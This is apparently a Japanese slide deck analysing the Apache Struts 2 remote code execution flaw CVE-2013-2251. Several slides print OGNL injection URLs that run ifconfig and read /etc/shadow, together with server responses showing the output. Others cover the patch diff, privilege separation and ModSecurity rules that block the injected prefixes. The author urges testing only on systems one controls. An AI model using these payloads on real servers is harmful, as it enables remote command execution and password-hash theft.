Downloaded 56 times
![なんでこうなる?2.3.15と2.3.15.1のソースをdiffってみたら、こんな結果「action:」は、正規表現で[a-zA-Z0-9._!/-]*以外の文字は除去されるように修正されたようです。「redirect:」や「redirectAction:」は、DefaultActionMapper から削除されています。極刑に処されたようです。無罪なので「method:」は変更ないようです。](/image.pl?url=https%3a%2f%2fimage.slidesharecdn.com%2fcve-2013-2251-130727011425-phpapp02%2f75%2fCve-2013-2251-5-2048.jpg&f=jpg&w=240)
![どうやる?2公開されたPoCは以下となっています。環境にあわせてURLを一部変更しています。① http://host/example/HelloWorld.action?action:%25{3*4}⑤ http://host/example/HelloWorld.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘ifconfig'})).start()}→12.jspへアクセスを試みる。そんなファイル存在しないので404エラー。② http://host/example/HelloWorld.action?redirect:%25{3*4}③ http://host/example/HelloWorld.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘ifconfig'})).start()}④ http://host/example/HelloWorld.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘ifconfig'})).start()}→リダイレクトされ、/example/12へアクセスを試みるが、そんなファイル存在しないので404エラー。→java.lang.UNIXProcess@xxxxxxx.jspへアクセスを試みるが、そんなファイル存在しないので404エラー。](/image.pl?url=https%3a%2f%2fimage.slidesharecdn.com%2fcve-2013-2251-130727011425-phpapp02%2f75%2fCve-2013-2251-7-2048.jpg&f=jpg&w=240)
![どうやる?2http://host//example/HelloWorld.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[] {'ifconfig'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader (#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(),#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#f.getWriter().println (#e),#f.getWriter().flush(),#f.getWriter().close()}「なんだ、うまくいかないじゃん」という結論は時期尚早です。※GETパラメータの値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。以下、GETでアクセスHTTP/1.1 200 OKServer: Apache-Coyote/1.1Transfer-Encoding: chunkedDate:Wed, 24 Jul 2013 22:35:12GMTc351eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xxinet addr:xxx.xxx.xxx.xxx Bcast:xxx.xxx.xxx.xxx Mask:255.255.255.0レスポンス(抜粋)↓NIC情報が出力された。](/image.pl?url=https%3a%2f%2fimage.slidesharecdn.com%2fcve-2013-2251-130727011425-phpapp02%2f75%2fCve-2013-2251-8-2048.jpg&f=jpg&w=240)
![さっきのなんだったの?201 http://host//example/HelloWorld.action?redirect:${02 #a=(new java.lang.ProcessBuilder(new java.lang.String[] {'ifconfig'})).start()03 ,#b=#a.getInputStream()04 ,#c=new java.io.InputStreamReader (#b)05 ,#d=new java.io.BufferedReader(#c)06 ,#e=new char[50000]07 ,#d.read()08 ,#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')09 ,#f.getWriter().println (#e)10 ,#f.getWriter().flush()11 ,#f.getWriter().close()12 }※GETのパラメータ値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。※見やすくするため、改行を入れてます。02で実行させたいコマンドを指定し、それ以降でコマンドの実行結果が出力されます。ココ](/image.pl?url=https%3a%2f%2fimage.slidesharecdn.com%2fcve-2013-2251-130727011425-phpapp02%2f75%2fCve-2013-2251-10-2048.jpg&f=jpg&w=240)
![ほかにも3①権限分離なしの場合http://host//example/HelloWorld.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[] {’cat’,’/etc/shadow’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader (#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(),#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#f.getWriter().println (#e),#f.getWriter().flush(),#f.getWriter().close()}HTTP/1.1 200 OKServer: Apache-Coyote/1.1Date: Sat, 27 Jul 2013 05:16:54 GMTContent-Length: 50001root:*******************.:xxx:0:99999:7:::bin:*:xxx:0:99999:7:::daemon:*:xxx:99999:7:::/etc/shadowを出力するようにすると・・・モザイクなしの18禁ばりに見えてる。レスポンス(抜粋)※GETパラメータの値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。](/image.pl?url=https%3a%2f%2fimage.slidesharecdn.com%2fcve-2013-2251-130727011425-phpapp02%2f75%2fCve-2013-2251-20-2048.jpg&f=jpg&w=240)
![ほかにも4②権限分離ありの場合http://host//example/HelloWorld.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[] {’cat’,’/etc/shadow’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader (#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(),#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#f.getWriter().println (#e),#f.getWriter().flush(),#f.getWriter().close()}HTTP/1.1 200 OKServer: Apache-Coyote/1.1Date: Sat, 27 Jul 2013 05:31:40 GMTContent-Length: 50001同様に/etc/shadowを出力するようにすると・・・アカウント情報が出力されなくなった。レスポンス(抜粋)※GETパラメータの値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。](/image.pl?url=https%3a%2f%2fimage.slidesharecdn.com%2fcve-2013-2251-130727011425-phpapp02%2f75%2fCve-2013-2251-21-2048.jpg&f=jpg&w=240)
Recommended
More Related Content
More from abend_cve_9999_0001
Cve 2013-2251
- 1.CVE-2013-2251ー strutsと愉快な脆弱性達 続編ー※本稿の内容を管理下ではない環境に対して実施しないでください。
- 2.
- 3.CVE-2013-22512013年7月16日に公開されたApache Struts2系に存在するリモートの攻撃者によりOSコマンドが実行可能な脆弱性。2.3.15.1で改修されています。Apache SoftwareFoundationhttp://struts.apache.org/release/2.3.x/docs/s2-016.htmlLAChttp://www.lac.co.jp/security/alert/2013/07/18_alert_01.html本脆弱性を悪用する攻撃が増えているそうです。
- 4.
- 5.
- 6.どうやる?Apache Software FoundationからPoC(Proofof Concept)が公開されています。http://struts.apache.org/release/2.3.x/docs/s2-016.html発見者は、三井物産セキュアディレクションのTakeshiTeradaさんだそうです。
- 7.どうやる?2公開されたPoCは以下となっています。環境にあわせてURLを一部変更しています。① http://host/example/HelloWorld.action?action:%25{3*4}⑤ http://host/example/HelloWorld.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘ifconfig'})).start()}→12.jspへアクセスを試みる。そんなファイル存在しないので404エラー。②http://host/example/HelloWorld.action?redirect:%25{3*4}③ http://host/example/HelloWorld.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘ifconfig'})).start()}④ http://host/example/HelloWorld.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘ifconfig'})).start()}→リダイレクトされ、/example/12へアクセスを試みるが、そんなファイル存在しないので404エラー。→java.lang.UNIXProcess@xxxxxxx.jspへアクセスを試みるが、そんなファイル存在しないので404エラー。
- 8.どうやる?2http://host//example/HelloWorld.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ifconfig'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader (#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(),#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#f.getWriter().println (#e),#f.getWriter().flush(),#f.getWriter().close()}「なんだ、うまくいかないじゃん」という結論は時期尚早です。※GETパラメータの値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。以下、GETでアクセスHTTP/1.1 200 OKServer: Apache-Coyote/1.1Transfer-Encoding: chunkedDate:Wed, 24 Jul 2013 22:35:12GMTc351eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xxinet addr:xxx.xxx.xxx.xxx Bcast:xxx.xxx.xxx.xxx Mask:255.255.255.0レスポンス(抜粋)↓NIC情報が出力された。
- 9.さっきのなんだったの?PoCの③、④、⑤は実行させるJavaが不完全だった。動作させるために複数のコードを追加されています。「,」(カンマ)で複数のコードを追加可能。###Used by theDefaultActionMapper### You may provide a comma separated list, e.g. struts.action.extension=action,jnlp,do###The blank extension allows you to match directory listings as well as pure action names### without interfering with static resources, which can be specified as an empty string### prior to a comma e.g. struts.action.extension=, or struts.action.extension=x,y,z,,「,」(カンマ)で複数のコードが認識され、実行に至ったのではないかと推測されます。色々と調べてみたら、default.propertiesに以下のような記述がありました。
- 10.さっきのなんだったの?201 http://host//example/HelloWorld.action?redirect:${02 #a=(newjava.lang.ProcessBuilder(new java.lang.String[] {'ifconfig'})).start()03 ,#b=#a.getInputStream()04 ,#c=new java.io.InputStreamReader (#b)05 ,#d=new java.io.BufferedReader(#c)06 ,#e=new char[50000]07 ,#d.read()08 ,#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')09 ,#f.getWriter().println (#e)10 ,#f.getWriter().flush()11 ,#f.getWriter().close()12 }※GETのパラメータ値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。※見やすくするため、改行を入れてます。02で実行させたいコマンドを指定し、それ以降でコマンドの実行結果が出力されます。ココ
- 11.
- 12.なんでできない?tomcat/shopping商品購入機能Struts 2.1.8.1例でショッピングサイトのツギハギ更新を考えてみる。/mypageマイページ機能Struts 2.2.1.1機能追加機能追加/askme問い合わせ機能Struts2.3.14.3/manager管理用機能Struts 2.3.15機能追加常にstrutsの更新を行わないと、機能単位で異なるバージョン状況を生んでしまう。
- 13.
- 14.
- 15.なんとか、なんないの?2WAFでリクエストに「action:」、「redirect:」、「redirectAction:」が含まれていたらブロックする。「Action:」、「aCtion:」や「RedirectAction:」などを試してみたが、脆弱性が発現されなかったので上記のパターンでいいのではないか。じゃあ、どうブロックする?SecRule ARGS_NAMES "action:""phase:2,t:none,auditlog,deny,id:'999998'“SecRule ARGS_NAMES "redirect:" "phase:2,t:none,auditlog,deny,id:'999997'"SecRule ARGS_NAMES "redirectAction:" "phase:2,t:none,auditlog,deny,id:'999996'"
- 16.
- 17.
- 18.
- 19.
- 20.ほかにも3①権限分離なしの場合http://host//example/HelloWorld.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{’cat’,’/etc/shadow’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader (#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(),#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#f.getWriter().println (#e),#f.getWriter().flush(),#f.getWriter().close()}HTTP/1.1 200 OKServer: Apache-Coyote/1.1Date: Sat, 27 Jul 2013 05:16:54 GMTContent-Length: 50001root:*******************.:xxx:0:99999:7:::bin:*:xxx:0:99999:7:::daemon:*:xxx:99999:7:::/etc/shadowを出力するようにすると・・・モザイクなしの18禁ばりに見えてる。レスポンス(抜粋)※GETパラメータの値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。
- 21.ほかにも4②権限分離ありの場合http://host//example/HelloWorld.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{’cat’,’/etc/shadow’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader (#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(),#f= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#f.getWriter().println (#e),#f.getWriter().flush(),#f.getWriter().close()}HTTP/1.1 200 OKServer: Apache-Coyote/1.1Date: Sat, 27 Jul 2013 05:31:40 GMTContent-Length: 50001同様に/etc/shadowを出力するようにすると・・・アカウント情報が出力されなくなった。レスポンス(抜粋)※GETパラメータの値はコピペしても動作しないように、内容の理解に問題のない個所を2byte変更しています。
- 22.
- 23.
- 24.